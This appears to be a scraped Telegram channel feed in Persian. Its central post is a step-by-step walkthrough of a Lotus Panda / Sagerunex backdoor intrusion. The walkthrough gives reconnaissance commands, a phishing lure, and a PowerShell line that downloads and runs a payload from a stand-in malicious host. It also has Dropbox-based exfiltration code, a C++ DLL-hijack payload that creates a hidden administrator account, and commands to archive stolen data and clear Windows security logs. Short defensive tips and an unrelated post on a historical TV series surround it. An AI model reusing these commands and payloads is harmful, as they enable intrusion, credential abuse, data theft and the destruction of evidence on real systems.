⬅️ فعال‌سازی MFA برای اکانت‌های حساس
⬅️ نظارت روی ترافیک شبکه برای تشخیص ارتباطات C2
⬅️ اجرای آپدیت‌های امنیتی و پچ‌های آسیب‌پذیری‌های موجود
⬅️ مانیتورینگ دقیق سیستم‌ها با ابزارهای EDR/XDR برای شناسایی فعالیت‌های مشکوک

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍94🔥3❤‍🔥2👌21🤮1🙏1💯1🏆1
تحلیل فنی حمله Lotus Panda با Sagerunex Backdoor

گروه Lotus Panda یکی از گروه‌های APT چینیه که با استفاده از نسخه‌ آپدیت شده‌ Sagerunex Backdoor به هدف‌هایی تو حوزه‌ دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیک‌های پیشرفته نفوذ، بایپس مکانیزم‌های امنیتی، و افزایش سطح دسترسی تو تارگت بهره می‌بره.

🔹 مرحله 1. شناسایی تارگت و جمع‌آوری اطلاعات اولیه
👈 تکنیک‌های شناسایی اولیه (OSINT)
⬅️ شناسایی دامنه‌ها و ایمیل‌های مرتبط با تارگت
theHarvester -d target.com -l 500 -b google

⬅️ بررسی پورت‌ها و سرویس‌های در حال اجرا
nmap -sS -sV -p- -T4 target.com

⬅️ جستجو برای آسیب‌پذیری‌های احتمالی تو سیستم‌ها
shodan search "port:443 org:TargetOrganization"


🔹 مرحله 2. روش‌های نفوذ اولیه به تارگت
👈 حمله‌ Spear Phishing
Asunto: Actualización de seguridad obligatoria

Estimado usuario,

Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.

Atentamente,
Soporte Técnico


🔹 مرحله 3. اجرای بدافزار و استقرار Sagerunex
👈 کد PowerShell برای دانلود و اجرای بدافزار:
Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"


🔹 مرحله 4. برقراری ارتباط با سرور C2
👈 کد ارتباط با C2 از طریق Dropbox API
import dropbox

ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)

def send_data(data):
dbx.files_upload(data.encode(), "/logs/data.txt")

send_data("Captured keystrokes and files")


🔹 مرحله 5. افزایش سطح دسترسی و حرکت جانبی تو شبکه
👈 الف) افزایش سطح دسترسی با اجرای اکسپلویت‌های Local Privilege Escalation
winPEAS.bat > report.txt

👈 ب) اجرای DLL Hijacking برای افزایش سطح دسترسی
کد ساخت یک DLL مخرب تو C++
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
}
return TRUE;
}

⬅️ کامپایل و ایجاد DLL مخرب:
x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows


🔹 مرحله 6. استخراج اطلاعات و حذف ردپا
👈 الف) فشرده‌سازی و رمزگذاری داده‌ها برای ارسال به C2
Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"

👈 ب) حذف ردپاها و لاگ‌های ویندوز
Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security


🔹 راه‌کارهای دفاعی که توسط رضا ارائه شده رو حتما بخونین. جالبه:
https://news.1rj.ru/str/safe_defense/136

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
117👍7❤‍🔥4🔥2💩2🍌2👏1💯1🏆1
پست غیر فنی
این سریال معاویه رو اگه نگاه می‌کنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
👍117👎19👌8🤣7💩54👏3🔥1